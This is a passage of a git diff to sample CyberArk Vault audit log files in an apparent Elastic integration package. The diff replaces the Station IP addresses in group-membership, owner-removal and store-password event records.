01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_localhost.localdomain","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"PSMP_ADB_localhost.localdomain","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T17:58:01Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:01","IsoTimestamp":"2021-03-10T17:58:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T17:59:29Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:29","IsoTimestamp":"2021-03-10T17:59:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMApp_VAGRANT","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T17:59:30Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:30","IsoTimestamp":"2021-03-10T17:59:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMGw_VAGRANT","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T22:17:15Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:15","IsoTimestamp":"2021-03-10T22:17:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T22:19:16Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:16","IsoTimestamp":"2021-03-10T22:19:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMApp_ASR-WIN","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T22:19:16Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:16","IsoTimestamp":"2021-03-10T22:19:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMGw_ASR-WIN","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-11T16:59:38Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:38\n 2021-03-11T16:59:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMAppUsers\n PSMPApp_VAGRANT\n \n \n 81.32.170.205\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:38","IsoTimestamp":"2021-03-11T16:59:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_VAGRANT","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-11T16:59:38Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:38\n 2021-03-11T16:59:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PVWAGWAccounts\n PSMPGW_VAGRANT\n \n \n 81.32.170.205\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:38","IsoTimestamp":"2021-03-11T16:59:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_VAGRANT","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-14T12:57:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:17\n 2021-03-14T12:57:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PVWAGWAccounts\n PSMPGW_SSH\n \n \n 34.71.250.247\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:17","IsoTimestamp":"2021-03-14T12:57:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_SSH","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-14T12:57:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:17\n 2021-03-14T12:57:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMAppUsers\n PSMPApp_SSH\n \n \n 34.71.250.247\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:17","IsoTimestamp":"2021-03-14T12:57:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_SSH","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-14T12:57:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:21\n 2021-03-14T12:57:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMP_ADB_AppUsers\n PSMP_ADB_asr-cyberark-psm-ssh\n \n \n 34.71.250.247\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:21","IsoTimestamp":"2021-03-14T12:57:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"PSMP_ADB_asr-cyberark-psm-ssh","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_localhost.localdomain","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_localhost.localdomain","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"PSMP_ADB_localhost.localdomain","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T17:58:01Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:01","IsoTimestamp":"2021-03-10T17:58:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T17:59:29Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:29","IsoTimestamp":"2021-03-10T17:59:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMApp_VAGRANT","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T17:59:30Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:30","IsoTimestamp":"2021-03-10T17:59:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMGw_VAGRANT","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T22:17:15Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:15","IsoTimestamp":"2021-03-10T22:17:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T22:19:16Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:16","IsoTimestamp":"2021-03-10T22:19:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMApp_ASR-WIN","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T22:19:16Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:16","IsoTimestamp":"2021-03-10T22:19:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMGw_ASR-WIN","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-11T16:59:38Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:38\n 2021-03-11T16:59:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMAppUsers\n PSMPApp_VAGRANT\n \n \n 67.43.156.13\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:38","IsoTimestamp":"2021-03-11T16:59:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_VAGRANT","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-11T16:59:38Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:38\n 2021-03-11T16:59:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PVWAGWAccounts\n PSMPGW_VAGRANT\n \n \n 67.43.156.13\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:38","IsoTimestamp":"2021-03-11T16:59:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_VAGRANT","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-14T12:57:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:17\n 2021-03-14T12:57:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PVWAGWAccounts\n PSMPGW_SSH\n \n \n 67.43.156.15\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:17","IsoTimestamp":"2021-03-14T12:57:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_SSH","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-14T12:57:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:17\n 2021-03-14T12:57:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMAppUsers\n PSMPApp_SSH\n \n \n 67.43.156.15\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:17","IsoTimestamp":"2021-03-14T12:57:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_SSH","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-14T12:57:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:21\n 2021-03-14T12:57:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMP_ADB_AppUsers\n PSMP_ADB_asr-cyberark-psm-ssh\n \n \n 67.43.156.15\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:21","IsoTimestamp":"2021-03-14T12:57:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"PSMP_ADB_asr-cyberark-psm-ssh","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/266_remove_group_member.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/266_remove_group_member.log index 7b0f9be88a0..85ca20fc3cb 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/266_remove_group_member.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/266_remove_group_member.log @@ -1,2 +1,2 @@ -<5>1 2021-03-10T17:59:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:48","IsoTimestamp":"2021-03-10T17:59:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"266","Desc":"Remove Group Member","Severity":"Info","Issuer":"Administrator","Action":"Remove Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Group Member","GatewayStation":""}}} -<5>1 2021-03-10T22:19:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:23","IsoTimestamp":"2021-03-10T22:19:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"266","Desc":"Remove Group Member","Severity":"Info","Issuer":"Administrator","Action":"Remove Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Group Member","GatewayStation":""}}} +<5>1 2021-03-10T17:59:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:48","IsoTimestamp":"2021-03-10T17:59:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"266","Desc":"Remove Group Member","Severity":"Info","Issuer":"Administrator","Action":"Remove Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Group Member","GatewayStation":""}}} +<5>1 2021-03-10T22:19:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:23","IsoTimestamp":"2021-03-10T22:19:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"266","Desc":"Remove Group Member","Severity":"Info","Issuer":"Administrator","Action":"Remove Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Group Member","GatewayStation":""}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/273_remove_owner.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/273_remove_owner.log index ea1458e5874..6a20dacc257 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/273_remove_owner.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/273_remove_owner.log @@ -1 +1 @@ -<5>1 2021-03-10T17:59:33Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:33","IsoTimestamp":"2021-03-10T17:59:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"273","Desc":"Remove Owner","Severity":"Info","Issuer":"Administrator","Action":"Remove Owner","SourceUser":"Administrator","TargetUser":"","Safe":"PSMSessions","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Owner","GatewayStation":""}}} +<5>1 2021-03-10T17:59:33Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:33","IsoTimestamp":"2021-03-10T17:59:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"273","Desc":"Remove Owner","Severity":"Info","Issuer":"Administrator","Action":"Remove Owner","SourceUser":"Administrator","TargetUser":"","Safe":"PSMSessions","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Owner","GatewayStation":""}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/294_store_password.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/294_store_password.log index 2ea7c7cf132..8309f516cd2 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/294_store_password.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/294_store_password.log @@ -2,9 +2,9 @@ <5>1 2021-03-08T18:24:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:24:49","IsoTimestamp":"2021-03-08T18:24:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WinDesktopLocal-Address-adriansr","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"10.0.1.20"}}} <5>1 2021-03-08T19:20:02Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 11:20:02","IsoTimestamp":"2021-03-08T19:20:02Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"PasswordManager","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDesktopLocal"},{"Name":"UserName","Value":"x_accountA"},{"Name":"Address","Value":"components"},{"Name":"ResetImmediately","Value":"ChangeTask"},{"Name":"InProcess","Value":"ChangeTask"},{"Name":"SequenceID","Value":"26"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastTask","Value":"ChangeTask"},{"Name":"StartChangeNotBefore","Value":"1615231182"},{"Name":"GroupName","Value":"WindowsGroup"},{"Name":"LastSuccessChange","Value":"1614785704"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"Index","Value":"1"},{"Name":"DualAccountStatus","Value":"Inactive"},{"Name":"VirtualUsername","Value":"virtual"}]}}}} <5>1 2021-03-10T14:38:57Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 06:38:57","IsoTimestamp":"2021-03-10T14:38:57Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"PasswordManager","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Groups\\WindowsGroup","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WindowsDesktopLocalAccountsRotationalPolicy"},{"Name":"InProcess","Value":"ChangeTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"LastTask","Value":"ChangeTask"},{"Name":"LastSuccessChange","Value":"1615387136"},{"Name":"CurrInd","Value":"1"}]}}}} -<5>1 2021-03-10T17:58:06Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:06","IsoTimestamp":"2021-03-10T17:58:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSMServer","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":""}}} -<5>1 2021-03-10T22:17:26Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:26","IsoTimestamp":"2021-03-10T22:17:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSM-ASR-CYBERARK-WI","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":""}}} +<5>1 2021-03-10T17:58:06Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 